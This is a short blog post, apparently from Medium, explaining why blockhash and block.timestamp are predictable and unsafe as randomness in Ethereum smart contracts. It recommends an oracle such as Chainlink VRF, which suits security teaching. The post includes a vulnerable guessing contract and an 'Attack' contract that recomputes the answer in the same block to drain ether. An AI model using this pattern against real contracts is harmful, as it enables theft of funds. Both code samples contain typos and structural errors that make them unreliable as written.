The dangers of using blockhash and block timestamp for randomness in Ethereum contracts

2 min readJan 1, 2023

blockhash and block.timestamp are two properties of blocks in the Ethereum blockchain that contract developers often use to generate random numbers. However, there are several reasons why these methods should be avoided for this purpose.

First, the blockhash of a block is determined by the transactions and state roots of the previous block. This means that it is not truly random, as it is based on known information when the block is mined.

Similarly, the block timestamp is set by the block's miner and is not guaranteed to be accurate. Miners can manipulate the timestamp to their advantage, leading to potential security vulnerabilities.

Additionally, both blockhash and block timestamp are deterministic, which means that they will always produce the same output given the same input. This makes it easy for attackers to predict the output of these functions and exploit any vulnerabilities that may exist in your contract.

Here is an example:

contract GuessRandomNo {
  contructor() payable {}

  function guessNo(uint _guess) public {
    uint anser = uint(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp)));
  }
  
  if (_guess == answer){
    (bool sent, ) = msg.sender.call{value: 1 ether}("");
    require(sent, "Failed to send ether");
  }
}

The above vulnerability can easily be exploited:

contract Attack {
    receive() external payable {}

    function attact(GuessTheRandomNumber guessTheRandomNumber) public {
        uint answer = uint(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp)));
        guessRandomNo.guessNo(answer);
    }

    function getBalance() public view returns(uint) {
        return address(this).balance;
    }
}

Since both the transaction will be in the same block, the blocknumber and therefore blockhash will be same, and block.timestamp will also be the same, and therefore, attacker can easily find the random number and extract the ethers out of the contract.

In summary, it is important to be cautious when using blockhash and block.timestamp for generating random numbers in your contracts. Instead, consider using Oracles like chainlink VRF.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Hacking

Solidity

Smart Contract Security

Smart Contract Auditing

Smart Contract Blockchain

Written by Aniket Prajapati

15 Followers

31 Following

Afficianado - Blockchain - https://aniketpr01.github.io/

No responses yet

Write a response

What are your thoughts?

Also publish to my profile

More from Aniket Prajapati

As a developer, working with smart contract events on the blockchain can be challenging, as it…

Coinmonks

Aniket Prajapati

As a developer, working with smart contract events on the blockchain can be challenging, as it…

One popular example of a graph protocol is The Graph, which allows for indexing and querying smart contract events on the Ethereum…

Jan 10, 2023

The Benefits and Challenges of Implementing Upgradeable Smart Contracts

Aniket Prajapati

The Benefits and Challenges of Implementing Upgradeable Smart Contracts

Upgradeable smart contracts are smart contracts that allow for their code and/or data to be modified after deployment. This can be useful…

Jan 3, 2023

Aniket Prajapati

Delegate call: A double edge sword

Delegate call is a valuable tool in the Ethereum ecosystem that allows contract developers to execute code from another contract as if it…

Jan 1, 2023

Avoiding Arithmetic Vulnerabilities in Smart Contracts: Overflow and Underflow

Aniket Prajapati

Avoiding Arithmetic Vulnerabilities in Smart Contracts: Overflow and Underflow

Arithmetic overflow and underflow are vulnerabilities in smart contracts, self-executing programs that run on a blockchain. These…

Jan 1, 2023

See all from Aniket Prajapati

Recommended from Medium

Smart Contract Vulnerabilities Unveiled: Sandwich Attack

Mustafa Akbulut

Smart Contract Vulnerabilities Unveiled: Sandwich Attack

In decentralized finance (DeFi) and blockchain applications, the order in which transactions are executed can significantly impact the…

Sep 24, 2024

How to Become a Highly Paid Blockchain Developer in 2025

Stackademic

Blend Visions

How to Become a Highly Paid Blockchain Developer in 2025

The blockchain industry is not a fad; it is a revolution in the way we think about data and transactions and who we trust. Things have…

Jan 3

How I Am Using a Lifetime 100% Free Server

Harendra

How I Am Using a Lifetime 100% Free Server

Get a server with 24 GB RAM + 4 CPU + 200 GB Storage + Always Free

Oct 26, 2024

170

Getting to Know Basic Data Types in Solidity

CodeX

Muhammad Ihsan

Getting to Know Basic Data Types in Solidity

The paradigm of thinking about a trustworthy, and transparent system in this generation has changed after the rise of blockchain.

Jan 23

Smart Contract Vulnerabilities Unveiled: Strict Equalities

Coinmonks

Mustafa Akbulut

Smart Contract Vulnerabilities Unveiled: Strict Equalities

Smart contracts rely on conditional logic to make decisions, and equality checks (==) are a common way to compare values. However, using…

Sep 18, 2024

Cyfrin

Patrick Collins

How to Become a Smart Contract Auditor

We look at the roadmap to become a web3 security researcher, (sometimes called smart contract auditor) and tell you the exact steps to be…

Jan 12, 2024

See more recommendations

Help
Status
About
Careers
Press
Blog
Privacy
Terms
Text to speech
Teams